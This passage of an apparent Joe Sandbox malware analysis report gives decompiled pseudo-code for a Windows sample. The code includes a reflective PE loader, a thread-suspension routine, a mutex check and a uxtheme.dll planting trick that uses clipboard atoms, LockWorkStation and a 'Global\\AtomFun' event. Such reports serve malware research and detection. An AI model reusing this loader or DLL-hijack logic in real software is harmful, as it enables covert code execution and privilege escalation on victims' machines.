    							 *(_v28 + 0xc) =  *(_v28 + 0xc) & 0x00000000;
    							 *(_v28 + 8) =  *(_v28 + 8) & 0x00000000;
    							 *(_v28 + 0x10) =  *(_v28 + 0x10) & 0x00000000;
    							VirtualAlloc(_v16,  *(_v36 + 0x50), 0x1000, 4); // executed
    							_t93 = VirtualAlloc(_v16,  *(_v36 + 0x54), 0x1000, 4); // executed
    							_v8 = _t93;
    							_push(_v12[0x1e] +  *(_v36 + 0x54));
    							_push(_v12);
    							_push(_v8);
    							E00DB1489();
    							 *_v28 = _v8 + _v12[0x1e];
    							 *((intOrPtr*)( *_v28 + 0x34)) = _v16;
    							E00DB171C(_a4, _v36, _v28); // executed
    							_t129 = _v16 -  *(_v36 + 0x34);
    							_v32 = _t129;
    							if(_t129 != 0) {
    								E00DB1884(_v28, _v32);
    							}
    							_t104 = E00DB1903(_t129, _v28); // executed
    							if(_t104 != 0) {
    								E00DB17BF(_t129, _v28); // executed
    								if( *((intOrPtr*)( *_v28 + 0x28)) == 0) {
    									L18:
    									return _v28;
    								}
    								_t131 = _v16 +  *((intOrPtr*)( *_v28 + 0x28));
    								_v24 = _t131;
    								if(_t131 != 0) {
    									_v20 = _v24(_v16, 1, 0);
    									if(_v20 != 0) {
    										 *(_v28 + 0x10) = 1;
    										goto L18;
    									}
    									goto L19;
    								}
    								goto L19;
    							} else {
    								L19:
    								E00DB1A23(_t132, _v28);
    								return 0;
    							}
    						} else {
    							return 0;
    						}
    					}
    					return 0;
    				}
    				return 0;
    			}

















    0x00db1a94
    0x00db1a9d
    0x00db1aab
    0x00db1abd
    0x00db1ac9
    0x00db1ae5
    0x00db1aeb
    0x00db1af2
    0x00db1b09
    0x00db1b09
    0x00db1b10
    0x00db1b20
    0x00db1b29
    0x00db1b2f
    0x00db1b36
    0x00db1b3d
    0x00db1b51
    0x00db1b67
    0x00db1b6d
    0x00db1b7c
    0x00db1b7d
    0x00db1b80
    0x00db1b83
    0x00db1b94
    0x00db1b9e
    0x00db1baa
    0x00db1bb5
    0x00db1bb8
    0x00db1bbb
    0x00db1bc3
    0x00db1bc3
    0x00db1bcb
    0x00db1bd2
    0x00db1bdb
    0x00db1be9
    0x00db1c20
    0x00000000
    0x00db1c20
    0x00db1bf3
    0x00db1bf6
    0x00db1bf9
    0x00db1c09
    0x00db1c10
    0x00db1c19
    0x00000000
    0x00db1c19
    0x00000000
    0x00db1c12
    0x00000000
    0x00db1bd4
    0x00db1c25
    0x00db1c28
    0x00000000
    0x00db1c2d
    0x00db1b12
    0x00000000
    0x00db1b12
    0x00db1b10
    0x00000000
    0x00db1acb
    0x00000000

    APIs
    • VirtualAlloc.KERNELBASE(?,?,00002000,00000004,?,?,?,00DB1426,00000000,?,00000000,?,?,?), ref: 00DB1AE5
    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,?,?,00DB1426,00000000), ref: 00DB1B03
      • Part of subcall function 00DB14F3: VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004,00DB1408,?,?,?), ref: 00DB1500
    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000014,?,?,?,00DB1426,00000000), ref: 00DB1B51
    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?,00DB1426,00000000), ref: 00DB1B67
      • Part of subcall function 00DB171C: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,00000000,00000000,?,00000000), ref: 00DB176D
      • Part of subcall function 00DB171C: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,00000000,00000000,?,00000000), ref: 00DB178A
      • Part of subcall function 00DB1903: IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?), ref: 00DB1933
      • Part of subcall function 00DB1903: LoadLibraryA.KERNEL32(?), ref: 00DB195A
      • Part of subcall function 00DB1903: GetProcAddress.KERNEL32(?,00000012,?,?), ref: 00DB19CF
      • Part of subcall function 00DB1903: IsBadReadPtr.KERNEL32(-000000DC,00000014,?,?), ref: 00DB1A05
      • Part of subcall function 00DB17BF: VirtualFree.KERNEL32(?,?,00004000,?,00000000,00000000,?,?,?,00DB1BE0,?,?,00000000,?,?,?), ref: 00DB180F
      • Part of subcall function 00DB17BF: VirtualProtect.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,00DB1BE0,?,?,00000000,?,?), ref: 00DB185B
      • Part of subcall function 00DB1A23: FreeLibrary.KERNEL32(?,?,00000000,00000000,00DB1C2D,?,?,?,?,00DB1426), ref: 00DB1A60
      • Part of subcall function 00DB1A23: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000000,00DB1C2D,?,?,?,?,00DB1426), ref: 00DB1A83
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: Virtual$Alloc$Free$LibraryRead$AddressLoadProcProtect
    • String ID:
    • API String ID: 4109881786-0
    • Opcode ID: 02eb2f0a0a22f84c9da743ed2851a08c96e3c713756c16c577c8354579060068
    • Instruction ID: f53aa9ae489532efa7a6123948a687bbb05a99cf9dc35588e26e265aec6cc0c3
    • Opcode Fuzzy Hash: 02eb2f0a0a22f84c9da743ed2851a08c96e3c713756c16c577c8354579060068
    • Instruction Fuzzy Hash: E551B378A00209EFDF05DF94C856EEEBBB1FF08311F444099E602AB2A1D7759990DFA4
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 287 db17bf-db17db 288 db17e1-db17e6 287->288 289 db1880-db1881 287->289 290 db17e7-db1802 288->290 291 db1817-db182c 290->291 292 db1804-db1815 VirtualFree 290->292 294 db182e 291->294 295 db1834-db183b 291->295 293 db1865-db1877 292->293 293->290 296 db187d-db187f 293->296 294->295 297 db183d-db1840 295->297 298 db1852-db1863 VirtualProtect 295->298 296->289 299 db1842-db1845 297->299 300 db1847-db1849 297->300 298->293 298->296 301 db184e-db1850 299->301 300->293 302 db184b 300->302 301->293 301->298 302->301
    C-Code - Quality: 100%
    			E00DB17BF(void* __ecx, int* _a4) {
    				signed int _v8;
    				long _v12;
    				int _t34;
    				int _t36;
    				signed char* _t40;
    				void* _t44;
    				signed int _t47;
    				intOrPtr _t52;
    				signed char _t54;
    				unsigned int _t57;
    				long _t58;
    				unsigned int _t61;
    				signed int _t63;
    				long _t64;
    
    				_t34 =  *_a4;
    				_v8 = _v8 & 0x00000000;
    				_t44 = ( *(_t34 + 0x14) & 0x0000ffff) + _t34 + 0x18;
    				if(0 <  *((intOrPtr*)(_t34 + 6))) {
    					_t40 = _t44 + 0x24;
    					do {
    						_t61 =  *_t40;
    						_t47 = _t61 >> 0x0000001d & 0x00000001;
    						_t63 = _t61 >> 0x0000001e & 0x00000001;
    						_t57 =  *_t40 >> 0x1f;
    						if(( *_t40 & 0x02000000) == 0) {
    							_t54 =  *_t40;
    							_t58 =  *(0xdb5000 + (_t57 + (_t63 + _t47 * 2) * 2) * 4);
    							if((_t54 & 0x04000000) != 0) {
    								_t58 = _t58 | 0x00000200;
    							}
    							_t64 =  *(_t40 - 0x14);
    							if(_t64 != 0) {
    								L12:
    								_t36 = VirtualProtect( *(_t40 - 0x1c), _t64, _t58,  &_v12); // executed
    								if(_t36 == 0) {
    									break;
    								}
    								goto L13;
    							} else {
    								if((_t54 & 0x00000040) == 0) {
    									if(_t54 >= 0) {
    										goto L13;
    									}
    									_t52 =  *((intOrPtr*)(_t36 + 0x24));
    									L11:
    									if(_t52 == 0) {
    										goto L13;
    									}
    									goto L12;
    								}
    								_t52 =  *((intOrPtr*)(_t36 + 0x20));
    								goto L11;
    							}
    						}
    						VirtualFree( *(_t40 - 0x1c),  *(_t40 - 0x14), 0x4000);
    						L13:
    						_t36 =  *_a4;
    						_v8 = _v8 + 1;
    						_t40 =  &(_t40[0x28]);
    					} while (_v8 < ( *(_t36 + 6) & 0x0000ffff));
    					return _t36;
    				}
    				return _t34;
    			}

















    0x00db17c7
    0x00db17cd
    0x00db17d3
    0x00db17db
    0x00db17e3
    0x00db17e7
    0x00db17e7
    0x00db17f3
    0x00db17f6
    0x00db17f9
    0x00db1802
    0x00db1817
    0x00db181f
    0x00db182c
    0x00db182e
    0x00db182e
    0x00db1834
    0x00db183b
    0x00db1852
    0x00db185b
    0x00db1863
    0x00000000
    0x00000000
    0x00000000
    0x00db183d
    0x00db1840
    0x00db1849
    0x00000000
    0x00000000
    0x00db184b
    0x00db184e
    0x00db1850
    0x00000000
    0x00000000
    0x00000000
    0x00db1850
    0x00db1842
    0x00000000
    0x00db1842
    0x00db183b
    0x00db180f
    0x00db1865
    0x00db1868
    0x00db186e
    0x00db1871
    0x00db1874
    0x00000000
    0x00db187f
    0x00db1881

    APIs
    • VirtualFree.KERNEL32(?,?,00004000,?,00000000,00000000,?,?,?,00DB1BE0,?,?,00000000,?,?,?), ref: 00DB180F
    • VirtualProtect.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,00DB1BE0,?,?,00000000,?,?), ref: 00DB185B
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: Virtual$FreeProtect
    • String ID:
    • API String ID: 2581862158-0
    • Opcode ID: 8b1c03d0c40ed982252d05209bafada637b1dba340f8ed871db1a1c04d74772d
    • Instruction ID: 6c63765b4017fcf349aa2fb2327d733e588950a9eb82d4890f3bf62fb5c1f1ea
    • Opcode Fuzzy Hash: 8b1c03d0c40ed982252d05209bafada637b1dba340f8ed871db1a1c04d74772d
    • Instruction Fuzzy Hash: F421AC3AA00214EFDB088F05D9A8FBA77A5FF45740F894198E9079B2A5DB30ED51DB60
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 303 db171c-db1740 304 db17ba-db17bc 303->304 305 db1742-db174a 303->305 306 db174f-db1753 305->306 307 db177f-db1799 VirtualAlloc call db1489 306->307 308 db1755-db1760 306->308 313 db179e-db17a1 307->313 310 db1762-db177d VirtualAlloc call db1467 308->310 311 db17a4-db17b6 308->311 310->311 311->306 314 db17b8-db17b9 311->314 313->311 314->304
    APIs
    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,00000000,00000000,?,00000000), ref: 00DB176D
    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,00000000,00000000,?,00000000), ref: 00DB178A
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 93281c14cf0f6ed5ab6b202462759646f010121c6f4300f485e68b5038ef42da
    • Instruction ID: 449ca516c4cd66b59f759c377b542a5a9e544ed28a4d9e89953ccb988fa466b2
    • Opcode Fuzzy Hash: 93281c14cf0f6ed5ab6b202462759646f010121c6f4300f485e68b5038ef42da
    • Instruction Fuzzy Hash: 3821F7B9A00208EFDB10DF99C995EAAB7F8EF48704F50845AF942DB351D670E950CB60
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 316 db22dc-db22e0 call db2291 318 db22e5-db22e9 316->318 319 db22eb-db22fd GetLastError CloseHandle 318->319 320 db2303-db2307 318->320 319->320
    C-Code - Quality: 86%
    			E00DB22DC(void* __eflags) {
    				void* _t2;
    				void* _t6;
    				void* _t7;
    
    				_t7 = 0; // executed
    				_t2 = E00DB2291(__eflags); // executed
    				_t6 = _t2;
    				if(_t6 != 0) {
    					_t1 = GetLastError() - 0xb7; // -183
    					asm("sbb esi, esi");
    					_t7 =  ~_t1 + 1;
    					CloseHandle(_t6);
    				}
    				return _t7;
    			}






    0x00db22de
    0x00db22e0
    0x00db22e5
    0x00db22e9
    0x00db22f1
    0x00db22f9
    0x00db22fc
    0x00db22fd
    0x00db22fd
    0x00db2307

    APIs
      • Part of subcall function 00DB2291: _memset.LIBCMT ref: 00DB22A1
      • Part of subcall function 00DB2291: CreateMutexA.KERNELBASE(7622DAA3,00000000,Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A},7622DAA3,001F0001,?,?,00000000,7622DAA3,00DB232C,00000000), ref: 00DB22C5
      • Part of subcall function 00DB2291: GetLastError.KERNEL32(?,?,00000000,7622DAA3,00DB232C,00000000), ref: 00DB22D1
    • GetLastError.KERNEL32(00000000,7622DAA3,00DB232C,00000000), ref: 00DB22EB
    • CloseHandle.KERNEL32(00000000), ref: 00DB22FD
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: ErrorLast$CloseCreateHandleMutex_memset
    • String ID:
    • API String ID: 4044507352-0
    • Opcode ID: ac2c8af6b7e13828bba5d380d464c9d35d1a0c596f88fba6b64b5fac7f8ff472
    • Instruction ID: bf323537c2a38c29cb57f039e8be57b3b0ebee8a662e17e81aa1d5c481821ff5
    • Opcode Fuzzy Hash: ac2c8af6b7e13828bba5d380d464c9d35d1a0c596f88fba6b64b5fac7f8ff472
    • Instruction Fuzzy Hash: 5BD0A737504532CB8721276D7C0C99BBB74DFD1FA13120219EC4AE3210CB204C0346F5
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 321 40101d-401043 323 401045-401047 321->323 324 40104a-40104d 323->324 325 401058-401084 324->325 326 40104f-401054 324->326 329 401085-40108c 325->329 326->324 327 401056 326->327 327->323 329->329 330 40108e-4010d2 GetComputerNameW 329->330 333 4010d6-40110c 330->333 336 40111a-401122 333->336 337 40110e-401118 333->337 338 401124-401134 336->338 339 401136-401140 336->339 337->336 338->339
    APIs
    • GetComputerNameW.KERNEL32(00000000,?), ref: 004010BF
    Memory Dump Source
    • Source File: 00000001.00000002.1212668515.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1212660695.00400000.00000004.sdmp
    • Associated: 00000001.00000002.1212676117.00402000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: ComputerName
    • String ID:
    • API String ID: 3545744682-0
    • Opcode ID: 5cfafb86fb150ef256dbbf0976cc62a29c7aba25a3c80d9efd8b766aac9a54dc
    • Instruction ID: fec0bbfb7cb5f5c9ff93f0aba7c4af0fb98ed251eecd6fb6de04687b49c31075
    • Opcode Fuzzy Hash: 5cfafb86fb150ef256dbbf0976cc62a29c7aba25a3c80d9efd8b766aac9a54dc
    • Instruction Fuzzy Hash: D831B075D10514AFEB50CEBC88453CABBF1BB8D351F618575EA59E7340EA3889839F20
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 340 db14f3-db1506 VirtualAlloc
    C-Code - Quality: 100%
    			E00DB14F3(long _a4) {
    				void* _t2;
    
    				_t2 = VirtualAlloc(0, _a4, 0x3000, 4); // executed
    				return _t2;
    			}




    0x00db1500
    0x00db1506

    APIs
    • VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004,00DB1408,?,?,?), ref: 00DB1500
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 786bbb09324558e326bfb219d026f576eb8cef762ca7d3d81b460934db655b2d
    • Instruction ID: 6c34671c4d1e9dd2474113f082fa61884b1b039c6196ccb7cec79d9555f4fb95
    • Opcode Fuzzy Hash: 786bbb09324558e326bfb219d026f576eb8cef762ca7d3d81b460934db655b2d
    • Instruction Fuzzy Hash: E0B01279684300FAE51157404D17F057F105750B11F00C000B304581D041B00010CA39
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 100%
    			E00DB1C33(int _a4, intOrPtr _a8) {
    				signed int _v8;
    				intOrPtr _v24;
    				long _v28;
    				void _v32;
    				void* _v36;
    				long _t29;
    				void* _t33;
    				signed int _t34;
    				void* _t42;
    
    				_v8 = _v8 & 0x00000000;
    				_t33 = CreateToolhelp32Snapshot(4, _a4);
    				if(_t33 == 0xffffffff) {
    					GetLastError();
    					L15:
    					return _v8;
    				}
    				_t34 = 6;
    				memset( &_v32, 0, _t34 << 2);
    				_v36 = 0x1c;
    				if(Thread32First(_t33,  &_v36) == 0) {
    					GetLastError();
    					goto L13;
    				} else {
    					do {
    						if(_v24 == _a4) {
    							_t29 = _v28;
    							if(_a8 == 0 || _t29 == _a8) {
    								_t42 = OpenThread(2, 0, _t29);
    								if(_t42 != 0) {
    									if(SuspendThread(_t42) != 0xffffffff) {
    										_v8 = _v8 + 1;
    									}
    									CloseHandle(_t42);
    								}
    							}
    						}
    					} while (Thread32Next(_t33,  &_v36) != 0);
    					L13:
    					CloseHandle(_t33);
    					goto L15;
    				}
    			}












    0x00db1c39
    0x00db1c48
    0x00db1c4d
    0x00db1ccc
    0x00db1cd2
    0x00db1cd7
    0x00db1cd7
    0x00db1c52
    0x00db1c58
    0x00db1c5f
    0x00db1c73
    0x00db1cc0
    0x00000000
    0x00db1c75
    0x00db1c76
    0x00db1c7c
    0x00db1c82
    0x00db1c85
    0x00db1c97
    0x00db1c9b
    0x00db1ca7
    0x00db1ca9
    0x00db1ca9
    0x00db1cad
    0x00db1cad
    0x00db1c9b
    0x00db1c85
    0x00db1cb9
    0x00db1cc6
    0x00db1cc7
    0x00000000
    0x00db1cc9

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000004,?), ref: 00DB1C43
    • Thread32First.KERNEL32(00000000,?), ref: 00DB1C66
    • OpenThread.KERNEL32(00000002,00000000,00DB1FAF,7622D965,00000000,00000004,?,00000000), ref: 00DB1C91
    • SuspendThread.KERNEL32(00000000), ref: 00DB1C9E
    • CloseHandle.KERNEL32(00000000), ref: 00DB1CAD
    • Thread32Next.KERNEL32(00000000,0000001C), ref: 00DB1CB4
    • GetLastError.KERNEL32(00000000,00000004,?,00000000), ref: 00DB1CC0
    • CloseHandle.KERNEL32(00000000), ref: 00DB1CC7
    • GetLastError.KERNEL32(00000004,?,00000000,?,?,00DB1FAF,00000000,00000000,00000000), ref: 00DB1CCC
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: CloseErrorHandleLastThreadThread32$CreateFirstNextOpenSnapshotSuspendToolhelp32
    • String ID:
    • API String ID: 2698708724-0
    • Opcode ID: 5c158de03dea4ff16404acaa90009ce95620e0638fd3e800d25eb470a70ddbb4
    • Instruction ID: 7215ab3100440b43056a19001947202ec70c33e522c6695cccabd6f235e4cd0a
    • Opcode Fuzzy Hash: 5c158de03dea4ff16404acaa90009ce95620e0638fd3e800d25eb470a70ddbb4
    • Instruction Fuzzy Hash: 5C11083D940208EBDB21ABA4CD55FEEBBB8EF08360F640211F502E6291D770DD448B70
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00DB259B(CHAR* _a4) {
    				struct _WIN32_FIND_DATAA _v324;
    				void* _t4;
    				void* _t7;
    
    				_t7 = 0;
    				_t4 = FindFirstFileA(_a4,  &_v324);
    				if(_t4 != 0xffffffff) {
    					_t7 = 1;
    					FindClose(_t4);
    				}
    				return _t7;
    			}






    0x00db25af
    0x00db25b1
    0x00db25ba
    0x00db25bd
    0x00db25be
    0x00db25be
    0x00db25c8

    APIs
    • FindFirstFileA.KERNEL32(00DB2DA5,?,00000104), ref: 00DB25B1
    • FindClose.KERNEL32(00000000), ref: 00DB25BE
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: Find$CloseFileFirst
    • String ID:
    • API String ID: 2295610775-0
    • Opcode ID: af0ed99421243d67001db2372694620b48ab375b3f46bfbf7262521d4f6f035f
    • Instruction ID: 10e0edbe2848859e697a86e3e899d595c11bef3a72543081eee1d3830082e702
    • Opcode Fuzzy Hash: af0ed99421243d67001db2372694620b48ab375b3f46bfbf7262521d4f6f035f
    • Instruction Fuzzy Hash: 78D05EB6900124EBC7113769AC089EE766CDB09325F500321FE1AD11E0E734DA9A86F5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00DB3E80() {
    
    				return  *[fs:0x30];
    			}



    0x00db3e86

    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
    • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
    • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
    • Instruction Fuzzy Hash:
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 341 db3143-db3214 GetModuleHandleA GetSystemDirectoryA call db20ec call db2194 GetTempPathA call db20ec call db2194 GetTempPathA GetTickCount call db3620 wsprintfA GetModuleHandleA GetProcAddress 352 db3216-db3225 GetCurrentProcess 341->352 353 db3234 341->353 352->353 358 db3227-db322b 352->358 354 db3239-db3265 call db20ce GetClipboardFormatNameA call db20ec 353->354 363 db32a8-db32af 354->363 364 db3267-db327c call db2104 354->364 358->353 360 db322d-db322f 358->360 362 db34e8-db34ec 360->362 363->354 366 db32b1-db32b7 363->366 370 db328b-db32a0 call db3b50 364->370 371 db327e-db3284 364->371 368 db32bd-db32dc call db250c 366->368 369 db34e5 366->369 368->369 375 db32e2-db32ff call db2f02 368->375 369->362 370->363 378 db32a2-db32a5 370->378 371->370 380 db3368-db337c call db24aa 375->380 381 db3301-db3305 375->381 378->363 390 db337e 380->390 391 db3381-db338e LocalFree 380->391 382 db334b-db335f call db24aa 381->382 383 db3307-db3349 GetTempPathA GetTickCount call db3620 wsprintfA MoveFileA 381->383 382->380 393 db3361 382->393 383->382 390->391 391->369 392 db3394-db3398 391->392 394 db339e-db33ab call db3065 392->394 395 db3434-db343b call db27dd 392->395 393->380 394->369 400 db33b1 394->400 401 db343d-db3443 LockWorkStation 395->401 402 db3445-db3447 call db30cd 395->402 403 db33b8-db33e6 call db20ce GetClipboardFormatNameA call db20ec 400->403 404 db344c-db3461 CreateEventA 401->404 402->404 416 db33e8-db33fd call db3b50 403->416 417 db3403-db340d 403->417 407 db346b-db3479 WaitForSingleObject 404->407 408 db3463-db3469 GetLastError 404->408 410 db347b 407->410 411 db3482-db34df CloseHandle GetTempPathA GetTickCount call db3620 wsprintfA MoveFileA CopyFileA 407->411 408->369 410->411 411->369 416->369 416->417 417->403 419 db340f 417->419 421 db3416-db3426 RegisterWindowMessageA 419->421 421->408 422 db3428-db3432 421->422 422->395 422->421
    C-Code - Quality: 85%
    			E00DB3143(void* __eflags, intOrPtr _a4, intOrPtr _a8, int _a12) {
    				void* _v8;
    				struct _SECURITY_ATTRIBUTES* _v12;
    				char _v16;
    				signed int _v20;
    				signed int _v24;
    				struct _SECURITY_ATTRIBUTES* _v28;
    				signed int _v32;
    				struct HINSTANCE__* _v36;
    				char _v296;
    				char _v556;
    				char _v816;
    				char _v1076;
    				char _v1336;
    				char _v1596;
    				struct HINSTANCE__* _t88;
    				void* _t105;
    				signed int _t125;
    				void* _t130;
    				long _t135;
    				long _t162;
    				void* _t174;
    				void* _t182;
    				intOrPtr* _t189;
    				int _t190;
    				void* _t194;
    				void* _t195;
    				void* _t196;
    
    				_v28 = 0;
    				_t88 = GetModuleHandleA(0);
    				_v12 = 0;
    				_v24 = 0;
    				_v36 = _t88;
    				GetSystemDirectoryA( &_v816, 0x104);
    				E00DB2194(_t194 + E00DB20EC( &_v816) - 0x32c, "\\uxtheme.dll");
    				GetTempPathA(0x104,  &_v296);
    				E00DB2194(_t194 + E00DB20EC( &_v296) - 0x124, "\\uxtheme.dll");
    				GetTempPathA(0x104,  &_v1076);
    				_push(GetTickCount());
    				_push("\\%.8x.tmp");
    				_t105 = E00DB3620( &_v1076);
    				_pop(_t182);
    				wsprintfA(_t194 + _t105 - 0x430, ??);
    				_v32 = _v32 & 0x00000000;
    				_t196 = _t195 + 0xc;
    				_t189 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
    				if(_t189 != 0) {
    					_push( &_v32);
    					_push(GetCurrentProcess());
    					if( *_t189() == 0 || _v32 == 0) {
    						goto L4;
    					} else {
    						return 0;
    					}
    				}
    				L4:
    				_t190 = 0xc001;
    				do {
    					E00DB20CE( &_v556, 0, 0x104);
    					GetClipboardFormatNameA(_t190,  &_v556, 0x104);
    					if(E00DB20EC( &_v556) != 0) {
    						if(E00DB2104( &_v556,  &_v296) == 0) {
    							_v12 = _t190 & 0x0000ffff;
    							_v24 = 1;
    						}
    						_t174 = E00DB3B50( &_v556, "\\uxtheme.dll");
    						_pop(_t182);
    						if(_t174 != 0) {
    							_v12 = _t190 & 0x0000ffff;
    						}
    					}
    					_t190 = _t190 + 1;
    				} while (_t190 < 0xffff);
    				if(_v12 == 0) {
    					L38:
    					return _v28;
    				}
    				_v8 = 0;
    				_v16 = 0;
    				_v20 = 0;
    				if(E00DB250C(_t182,  &_v816,  &_v8,  &_v16) == 0) {
    					goto L38;
    				}
    				if(E00DB2F02(_v8, _v16,  &_v1076, _a12) != 0) {
    					if(_v24 != 0) {
    						GetTempPathA(0x104,  &_v1336);
    						_t162 = GetTickCount();
    						wsprintfA(_t194 + E00DB3620( &_v1336) - 0x534, "\\%.8x.tmp", _t162);
    						_t196 = _t196 + 0xc;
    						MoveFileA( &_v296,  &_v1336);
    					}
    					if(E00DB24AA( &_v296, _v8, _v16) != 0) {
    						_v20 = 1;
    					}
    				}
    				_t125 = E00DB24AA( &_v1076, _a4, _a8);
    				if(_t125 == 0) {
    					_v20 = _v20 & _t125;
    				}
    				LocalFree(_v8);
    				if(_v20 != 0) {
    					if(_v24 != 0) {
    						L30:
    						if(E00DB27DD() == 0) {
    							E00DB30CD(0x55);
    						} else {
    							__imp__LockWorkStation();
    						}
    						_t130 = CreateEventA(0, 0, 0, "Global\\AtomFun");
    						_a12 = _t130;
    						if(_t130 != 0) {
    							if(WaitForSingleObject(_t130, 0x2710) == 0) {
    								_v28 = 1;
    							}
    							CloseHandle(_a12);
    							GetTempPathA(0x104,  &_v1596);
    							_t135 = GetTickCount();
    							wsprintfA(_t194 + E00DB3620( &_v1596) - 0x638, "\\%.8x.tmp", _t135);
    							MoveFileA( &_v296,  &_v1596);
    							CopyFileA( &_v816,  &_v296, 0);
    						} else {
    							L34:
    							GetLastError();
    						}
    						goto L38;
    					}
    					if(E00DB3065(_v36, _v12) == 0) {
    						goto L38;
    					}
    					_a12 = 0xc001;
    					while(1) {
    						E00DB20CE( &_v556, 0, 0x104);
    						GetClipboardFormatNameA(_a12,  &_v556, 0x104);
